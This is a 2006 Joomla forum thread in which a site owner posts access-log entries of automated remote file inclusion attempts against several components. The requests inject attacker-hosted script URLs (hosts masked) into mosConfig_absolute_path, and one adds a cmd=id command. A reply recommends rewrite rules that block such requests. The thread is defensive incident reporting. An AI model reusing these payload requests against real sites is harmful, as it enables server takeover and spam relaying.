Joomla! Discussion Forums



Posted: Sun Aug 27, 2006 12:59 am 

Joined: Sat Nov 05, 2005 7:43 pm
Posts: 279
I was just rocked by something that I've stopped temporarily before too much mail got out. I was lucky to find my server crawl instantly and nail EXIM before too much went out. Here is what I've found (I have hidden the address for the ultimate file) -- UPDATE: Looking at the time I was getting nailed with "undeliverable message" warnings it looks like the remository extended is the culprit....

Looks like they are hitting MTree (I have version 1.59), Remository Extended (I will replace with the regular), and Artlinks (I don't have this installed?), Savant2?, HUNDREDS of requests to hit Comprofiler... is there any way to filter out attempts to hack a Joomla server in trying to hit the mos_config? This is just killing my server.

Our troops shouldn't be in Iraq... they should be out seeking these @#$@#$s....


81.24.26.185 - - [26/Aug/2006:18:28:57 -0400] "GET /administrator/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://XXXXXXXXXXXXXX/gi8ani/exploit.txt? HTTP/1.1" 301 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

81.215.225.126 - - [26/Aug/2006:15:04:06 -0400] "GET /administrator/component/com_remository/admin.remository.php?mosConfig_absolute_path=http://XXXXXXXXX/test.tar.gz?&list=1&cmd=id HTTP/1.0" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

81.215.225.126 - - [26/Aug/2006:14:59:50 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://XXXXXXXX/test.tar.gz?&list=1&cmd=id HTTP/1.0" 200 46 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

58.224.150.102 - - [26/Aug/2006:12:36:39 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://XXXXXXXXXXX/Poker/gyihhsqu.txt? HTTP/1.0" 200 46 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

61.3.96.8 - - [26/Aug/2006:12:36:22 -0400] "GET /com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http:XXXXXXXXX/Poker/gyihhsqu.txt? HTTP/1.0" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


60.190.243.175 - - [26/Aug/2006:12:35:58 -0400] "GET /Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://XXXXXXXXXX/Poker/gyihhsqu.txt? HTTP/1.0" 301 0 "-" "-"

201.248.90.194 - - [26/Aug/2006:12:34:45 -0400] "GET /Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://XXXXXXXX/Poker/gyihhsqu.txt? HTTP/1.0" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

201.248.90.194 - - [26/Aug/2006:12:34:40 -0400] "HEAD /Savant2_Plugin_textarea.php?mosConfig_absolute_path= HTTP/1.0" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"  [WHAT IS THIS????]

212.55.155.34 - - [26/Aug/2006:07:18:22 -0400] "GET /component/option,com_comprofiler/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://XXXXXXXX/e.txt? HTTP/1.1" 200 25277 "-" "libwww-perl/5.803"

_________________
http://www.thelaw.com - Free Legal Advice Resource
http://www.jnation.com - Free Jewish Dating & Social Networking


Last edited by slinky on Sun Aug 27, 2006 1:03 am, edited 1 time in total.
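
One way to triage an access log like the one in the post above is to flag every request that sets a `mosConfig_*` parameter in the URL and review first the ones the server answered with a 2xx status. This is an added example, not part of the original post; the sample lines are constructed (documentation IP addresses and a placeholder host), and the function names and the `investigate`/`probe` labels are assumptions.

```python
import re
from urllib.parse import unquote

# Combined Log Format: client IP, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Any query parameter named mosConfig_*: normal clients never set these via the URL.
PARAM_RE = re.compile(r'(?:^|[?&;])(mosConfig_\w+)=([^&;\s]*)', re.I)
REMOTE_RE = re.compile(r'^(?:https?|ftp):', re.I)


def classify(line):
    """Return a finding dict for a mosConfig_* request, or None for other traffic."""
    m = LOG_RE.match(line)
    if not m or '?' not in m['target']:
        return None
    path, query = m['target'].split('?', 1)
    p = PARAM_RE.search(unquote(query))  # unquote also catches %5F / %3D encodings
    if not p:
        return None
    status = int(m['status'])
    return {
        'ip': m['ip'],
        'path': path,
        'param': p.group(1),
        'remote_value': bool(REMOTE_RE.match(p.group(2))),
        'status': status,
        # 2xx: the server answered at that path, so check that script first.
        'priority': 'investigate' if 200 <= status < 300 else 'probe',
    }


# Constructed sample lines, shaped like the entries quoted in the post.
SAMPLE = [
    '192.0.2.11 - - [26/Aug/2006:12:34:40 -0400] "HEAD /Savant2_Plugin_textarea.php?mosConfig_absolute_path= HTTP/1.0" 301 0 "-" "-"',
    '192.0.2.10 - - [26/Aug/2006:14:59:50 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://host.invalid/x.txt?&list=1 HTTP/1.0" 200 46 "-" "-"',
    '192.0.2.12 - - [26/Aug/2006:12:40:00 -0400] "GET /index.php?mosConfig%5Flive_site%3Dhttp%3A%2F%2Fhost.invalid%2F HTTP/1.1" 404 0 "-" "-"',
    '192.0.2.13 - - [26/Aug/2006:12:41:00 -0400] "GET /index.php?option=com_content&task=view&id=1 HTTP/1.1" 200 5120 "-" "-"',
]


def triage(lines):
    """Return all findings, with the 2xx ('investigate') entries listed first."""
    findings = [f for f in map(classify, lines) if f]
    return sorted(findings, key=lambda f: f['priority'] != 'investigate')
```
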

Posted: Sun Aug 27, 2006 1:29 am 

Joined: Mon Dec 05, 2005 10:17 am
Posts: 1318
Location: New Orleans, LA, USA
slinky wrote:
Is there any way to filter out attempts to hack a Joomla server in trying to hit the mos_config? This is just killing my server.


http://forum.joomla.org/index.php/topic,75376.0.html

Those rewrite rules are effective enough that it was decided to include them in the default htaccess.txt in Joomla! 1.0.11. I know of several high traffic sites running them without any problems. I hope it helps you too.

_________________
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions


Posted: Sun Aug 27, 2006 11:22 pm 

Joined: Sat Nov 05, 2005 7:43 pm
Posts: 279
Perfect and muchas gracias. This is what I was looking for and will experiment with it. Incredible how many of these automated attacks are going on and CNET reported an increase in zombies of about 10% recently!

_________________
http://www.thelaw.com - Free Legal Advice Resource
http://www.jnation.com - Free Jewish Dating & Social Networking

